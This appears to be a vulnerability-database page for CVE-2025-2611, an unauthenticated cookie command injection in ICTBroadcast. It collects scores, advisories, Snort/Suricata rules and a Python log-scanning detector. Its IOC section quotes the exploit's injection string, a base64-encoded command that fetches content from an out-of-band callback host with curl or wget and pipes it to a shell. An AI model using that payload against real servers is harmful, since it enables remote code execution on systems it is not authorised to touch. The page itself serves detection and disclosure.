CVE-2025-2611
Published 2025-08-05
Priority P185 · critical · 9.3 (CVSS 4.0)
ITW EXPLOIT · VulnCheck KEV · Exploited in the wild
EPSS: 6.08% (92.5th percentile)
The ICTBroadcast application unsafely passes session cookie data to shell processing, allowing an attacker to inject shell commands into a session cookie that get executed on the server. This results in unauthenticated remote code execution in the session handling.
Versions 7.4 and below are known to be vulnerable.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ict_innovations | ictbroadcast | <= 7.4 | — |
Detection & IOCs (extracted from sources)

Command: `echo${IFS}{{base64('curl -s {{interactsh-url}} || wget -qO- {{interactsh-url}}')}}|base64${IFS}-d|sh`

Snort rule:

```
alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS ICTBroadcast Command Injection (CVE-2025-2611)"; flow:established,to_server; http.cookie; content:"BROADCAST|3d|"; pcre:"/^[^\x3b]*?(?:(?:\x3b|%3[Bb])|(?:\x0a|%0[Aa])|(?:\x60|%60)|(?:\x7c|%7[Cc])|(?:\x24|%24))+/R"; reference:url,www.vulncheck.com/blog/ictbroadcast-kev; reference:cve,2025-2611; classtype:web-application-attack; sid:2065259; rev:1;)
```

- The exploit targets GET /login.php with a malicious session cookie value containing shell metacharacters (backtick, pipe, semicolon, dollar sign, newline) in the cookie named by the server-set cookie name (observed as BROADCAST=).
- Detect shell injection characters in the BROADCAST cookie: semicolons (;/%3B), newlines (\x0a/%0A), backticks (`/%60), pipes (|/%7C), or dollar signs ($/%24) using the Emerging Threats PCRE pattern.
- Shodan query for exposed ICTBroadcast instances to identify attack surface.
- The exploit is unauthenticated — no prior session or credentials are required. Exploitation is confirmed by an out-of-band DNS callback (interactsh), so monitor for unexpected DNS/HTTP callbacks from web server processes.
- The exploit first probes GET /login.php to harvest the server-issued cookie name, then replays the same endpoint with the injected cookie. Two sequential requests to /login.php from the same source with differing cookie values is a strong behavioral signal.
- Versions 7.4 and below are confirmed vulnerable; the exact cookie name harvested from the server may vary, but the ET rule anchors on the 'BROADCAST=' prefix.
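The two detection ideas above, the metacharacter check on the BROADCAST cookie and the /login.php replay signal, implemented as a small log-scanning script. This is an added example and not code from ICTBroadcast, Emerging Threats or VulnCheck; the record layout (`src`, `path`, `cookie`, `set_cookie`), the sample addresses and the cookie values are constructed for the demonstration. It goes slightly beyond the bullet list in one respect: instead of comparing two consecutive request cookies, it compares the request cookie against the value the server issued in its own Set-Cookie header, which separates a normal first visit from a replay with a modified cookie.

```python
"""Detection helpers for the BROADCAST-cookie command-injection pattern.

Two signals are implemented: shell metacharacters in the BROADCAST cookie value
(the ET rule's character set) and a /login.php request whose BROADCAST value
differs from the one the server just issued to that source.
Record keys, sample addresses and cookie values are constructed for this example.
"""
import re

# Metacharacters the ET rule (sid 2065259) lists, raw or percent-encoded:
# ';' newline '`' '|' '$'.
METACHAR_RE = re.compile(r"\x3b|%3[Bb]|\x0a|%0[Aa]|\x60|%60|\x7c|%7[Cc]|\x24|%24")

# Split a Cookie header only at a ';' that begins another name=value pair, so a
# ';' injected into the BROADCAST value (followed by a command word rather than
# by 'name=') stays inside the value being inspected. Heuristic for this example.
PAIR_SPLIT_RE = re.compile(r";\s*(?=[A-Za-z0-9_\-]+=)")


def broadcast_cookie_value(header):
    """Return the BROADCAST value from a Cookie or Set-Cookie header, else None."""
    for pair in PAIR_SPLIT_RE.split(header):
        name, sep, value = pair.strip().partition("=")
        if sep and name == "BROADCAST":
            return value
    return None


def is_suspicious_cookie(cookie_header):
    """True when the BROADCAST value contains any listed metacharacter."""
    value = broadcast_cookie_value(cookie_header)
    return value is not None and METACHAR_RE.search(value) is not None


def login_replay_sources(records):
    """Sources whose /login.php request carried a BROADCAST value other than the
    one the server issued to them in an earlier /login.php response.

    Each record is a dict with constructed keys: src, path, cookie (request
    Cookie header) and set_cookie (response Set-Cookie header); both may be "".
    """
    issued = {}
    flagged = []
    for rec in records:
        if rec["path"] != "/login.php":
            continue
        sent = broadcast_cookie_value(rec.get("cookie") or "")
        expected = issued.get(rec["src"])
        if (expected is not None and sent is not None and sent != expected
                and rec["src"] not in flagged):
            flagged.append(rec["src"])
        new_value = broadcast_cookie_value(rec.get("set_cookie") or "")
        if new_value is not None:
            issued[rec["src"]] = new_value
    return flagged


# Constructed traffic: one ordinary visitor and one source that replays
# /login.php with a modified cookie (percent-encoded pipe, harmless command).
SAMPLE_RECORDS = [
    {"src": "198.51.100.7", "path": "/login.php", "cookie": "",
     "set_cookie": "BROADCAST=a1b2c3d4; Path=/; HttpOnly"},
    {"src": "198.51.100.7", "path": "/login.php", "cookie": "BROADCAST=a1b2c3d4",
     "set_cookie": ""},
    {"src": "203.0.113.9", "path": "/login.php", "cookie": "",
     "set_cookie": "BROADCAST=e5f6a7b8; Path=/; HttpOnly"},
    {"src": "203.0.113.9", "path": "/login.php", "cookie": "BROADCAST=e5f6a7b8%7Cid",
     "set_cookie": ""},
]


def scan(records):
    """Run both checks; returns (suspicious Cookie headers, replaying sources)."""
    bad_cookies = [r["cookie"] for r in records
                   if is_suspicious_cookie(r.get("cookie") or "")]
    return bad_cookies, login_replay_sources(records)


if __name__ == "__main__":
    cookies, sources = scan(SAMPLE_RECORDS)
    print("suspicious cookies:", cookies)
    print("replaying sources:", sources)
```

One difference from the ET rule is deliberate: the PCRE above scans everything after `BROADCAST=` with `^[^\x3b]*?(...)+`, and because `\x3b` is in the alternation it also matches the literal `;` that separates a following cookie, so a benign `BROADCAST=abc; PHPSESSID=x` header would alert. `is_suspicious_cookie` scopes the check to the BROADCAST value itself, at the cost of the pair-splitting heuristic shown in `PAIR_SPLIT_RE`.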
CVSS provenance

- NVD (CVSS v4.0): 9.3 CRITICAL — CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:L/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
- VulnCheck: 9.3 CRITICAL
- Vendor (Red Hat): 5.5 MEDIUM
GHSA

GHSA-3h67-687r-7fpc (ghsa_unreviewed · 2025-08-05): CVE-2025-2611 [CRITICAL], CWE-20. Same description as above; versions 7.4 and below are known to be vulnerable.
VulnCheck

VulnCheck (2025 · CVSS 9.3): CVE-2025-2611 [CRITICAL] — Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection'). Same description as above; versions 7.4 and below are known to be vulnerable.

Affected: ICTBroadcast (ICTBroadcast)
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://api.vulncheck.com/v3/index/vulncheck-canaries?cve=CVE-2025-2611&date=2025-10-12; https://api.vulncheck.com/v3/index/vulncheck-canaries?cve=CVE-2025-2611&date=202
Suricata

Suricata (ET · 2025-10-21 · CVSS 9.3): CVE-2025-2611 [CRITICAL] ET WEB_SPECIFIC_APPS ICTBroadcast Command Injection (CVE-2025-2611)

Rule (as extracted; the trailing metadata field is truncated):

```
alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS ICTBroadcast Command Injection (CVE-2025-2611)"; flow:established,to_server; http.cookie; content:"BROADCAST|3d|"; pcre:"/^[^\x3b]*?(?:(?:\x3b|%3[Bb])|(?:\x0a|%0[Aa])|(?:\x60|%60)|(?:\x7c|%7[Cc])|(?:\x24|%24))+/R"; reference:url,www.vulncheck.com/blog/ictbroadcast-kev; reference:cve,2025-2611; classtype:web-application-attack; sid:2065259; rev:1; metadata:attack_target Server, tls_state TLSDecrypt, created_at 2025_10_21, cve CVE_2025_2611, deployment Perimeter, deployment Internal, deployment SSLDecrypt, confidence High, signature_severity Major, tag Exploit, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2025_10_21, mitre_tactic_id TA0001, mi
```
Metasploit

ICTBroadcast Unauthenticated Remote Code Execution (Metasploit module)

This module exploits an unauthenticated remote code execution (RCE) vulnerability in ICTBroadcast. The vulnerability exists in the way session cookies are handled and processed, allowing an attacker to inject arbitrary system commands.
Nuclei

Nuclei (CVSS 9.3): CVE-2025-2611 [CRITICAL] ICTBroadcast - Command Injection. Same description as above; versions 7.4 and below are known to be vulnerable.

Template (as extracted; truncated):

```yaml
id: CVE-2025-2611
info:
  name: ICTBroadcast - Command Injection
  author: Chocapikk
  severity: critical
  description: |
    The ICTBroadcast application unsafely passes session cookie data to shell processing, allowing an attacker to inject shell commands into a session cookie that get executed on the server. This results in unauthenticated remote code execution in the session handling. Versions 7.4 and below are known to be vulnerable.
  impa
```